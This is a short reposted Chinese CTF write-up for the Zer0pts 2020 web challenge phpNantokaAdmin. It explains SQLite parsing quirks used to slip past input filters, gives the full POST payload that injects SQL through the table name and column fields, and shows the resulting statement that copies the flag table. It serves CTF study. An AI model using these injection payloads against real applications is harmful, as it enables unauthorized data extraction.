碼上快樂

相關內容    簡體    繁體

刷題記錄:[Zer0pts2020]phpNantokaAdmin

本文轉載自   查看原文   2020-05-08 17:34   668    web刷題

題目復現鏈接:https://buuoj.cn/challenges
參考鏈接:Zer0pts CTF 2020

sqlite bypass技巧

  • select的時候,當列名用空白字符隔開時,sqlite只會把空格之前的字符當做列名,並且忽視空格后的字符

  • []'"`、一樣可以包裹列名

  • sqlite可以create table ... as select ...

解題

posttable_name=[aaa]as select [flag_2a2d04c3][&columns[0][name]=]from flag_bf1811da;&columns[0][type]=2
最后拼接出來的sql語句是

create table [aaa] as select [flag_2a2d04c3][(dummy1 TEXT, dummy2 TEXT,`]from flag_bf1811da;`2);


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 [Zer0pts2020]Can you guess it? BUUCTF--[Zer0pts2020]easy strcmp 刷題記錄:[NPUCTF2020]ezlogin 刷題記錄:[BJDCTF2020]EzPHP BUUCTF-2020寒假刷題記錄 [總結]2020年6月 OI學習/刷題記錄 [總結]2020年3月 OI學習/刷題記錄 刷題記錄:[網鼎杯 2020 玄武組]SSRFMe [總結]2020年2月 OI學習/刷題記錄 算法刷題記錄
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM